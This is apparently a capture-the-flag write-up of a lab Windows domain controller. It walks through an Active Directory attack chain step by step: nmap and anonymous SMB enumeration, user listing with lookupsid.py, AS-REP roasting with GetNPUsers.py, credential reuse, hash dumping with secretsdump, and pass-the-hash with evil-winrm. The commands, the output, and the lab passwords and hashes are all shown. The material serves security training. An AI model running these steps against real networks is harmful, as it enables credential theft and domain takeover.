VulnNet Entertainment just deployed a new instance on their network with the newly-hired system administrators. Being a security-aware company, they as always hired you to perform a penetration test, and see how system administrators are performing.
This is a much simpler machine, do not overthink. You can do it by following common methodologies.
Not shown: 989 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-08-22 18:48:39Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: vulnnet-rst.local0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped Service Info: Host: WIN-2BO8M1OE1M1; OS: Windows; CPE: cpe:/o:microsoft:windows
Initial nmap response. Will start with enumerating the SMB shares.
mbmap -H 10.10.50.173 -u anonymous -p ""
[+] Guest session IP: 10.10.50.173:445 Name: 10.10.50.173
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
SYSVOL NO ACCESS Logon server share
VulnNet-Business-Anonymous READ ONLY VulnNet Business Sharing
VulnNet-Enterprise-Anonymous READ ONLY VulnNet Enterprise Sharing
We’ve got anonymous access to two folders so will download all the files and explore. There appears to be employee names, so we may be able to use them to password spray. Creating a list of potential logins from the names we collected we can use kerbrute to validate them.
──(kali㉿kali)-[/opt] └─$ ./kerbrute_linux_amd64 userenum -d vulnnet-rst.local --dc 10.10.50.173 ~/Desktop/thm/vuln_roasted/users
All of them failed, so no potential usernames. Back to the drawing board.
After a lot of Googling I come across an Ippsec video where he talks about exposed IPC$ shares and an impacket tool called lookupsid.py and using our anonymous login can grab a list of users.
1105: VULNNET-RST\a-whitehat (SidTypeUser) 1109: VULNNET-RST\t-skid (SidTypeUser) 1110: VULNNET-RST\j-goldenhand (SidTypeUser) 1111: VULNNET-RST\j-leet (SidTypeUser)
Continuing with the impacket theme, I’ll try GetNPUsers.py to attempt to obtain hashes for the usernames and it looks like we’re able to grab a hash for t-skid
└─$ ./GetNPUsers.py vulnnet-rst.local/ -dc-ip 10.10.50.173 -usersfile ~/Desktop/thm/vuln_roasted/users -no-pass Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [-] User a-whitehat doesn't have UF_DONT_REQUIRE_PREAUTH set $krb5asrep$23$t-skid@VULNNET-RST.LOCAL:905b58a5e24209b37ad61bf87f3f65f3$1832aa5cd8806cd7e1f225e27f3353e0965546503005f341be3b493711e8eeae8e372a86f701a80c2782cc1373dca8cdf44df8b8e595a0fbe88063ac9beef77c733105829b7f287f6b9ded207c1ca2de4b689b877ad11bec97c0d1351720297f6999ecebcb921a120862e742a40056401bce007292555f463dd90f962a93400bf9ecb650ad9730694ef5b4b0b5ac933d15c18bceaaf5fac96881e16830fe9e31d2a9c78722370c97b78aae74adfed02ffd553401472a40668a8f8c8427feb08f6738257985e8355d22f8705a790fe2a38b6672bf34a4e59462b54d25295a07b09402f265afdef30e872218d27d7bc585911d7dea2360 [-] User j-goldenhand doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User j-leet doesn't have UF_DONT_REQUIRE_PREAUTH set
Using t-skid we can authenticate back to SMB and find a script named ResetPassword.vbs inside. It contains the credentials for another user and using these with crackmapexec find we can get shell access with Evil-Winrm.
rackmapexec smb 10.10.50.173 -u a-whitehat -p bNdKVkjv3RR9ht SMB 10.10.50.173 445 WIN-2BO8M1OE1M1 [*] Windows 10.0 Build 17763 x64 (name:WIN-2BO8M1OE1M1) (domain:vulnnet-rst.local) (signing:True) (SMBv1:False) SMB 10.10.50.173 445 WIN-2BO8M1OE1M1 [+] vulnnet-rst.local\a-whitehat:bNdKVkjv3RR9ht (Pwn3d!)
We discover that a-whitehat is a domain admin, so since we’re on an impacket roll, let’s see what we can get from secretsdump…
/secretsdump.py VULNNET-RST.LOCAL/a-whitehat:bNdKVkjv3RR9ht@10.10.50.173 Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Service RemoteRegistry is in stopped state [*] Starting service RemoteRegistry [*] Target system bootKey: 0xf10a2788aef5f622149a41b2c745f49a [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:c2597747aa5e43022a3a3049a3c3b09d::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information. [*] Dumping cached domain logon information (domain/username:hash)
Successfully manage to dump an NTLM hash for the administrator account so can use Evil-WinRM to Pass the Hash…
┌──(kali㉿kali)-[~/Desktop/thm/vuln_roasted] └─$ evil-winrm -i 10.10.50.173 -u Administrator -H c2597747aa5e43022a3a3049a3c3b09d Evil-WinRM shell v3.4 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents>
This was a fun room in Active Directory basics and a nice tour through the amazing tools in the impacket suite.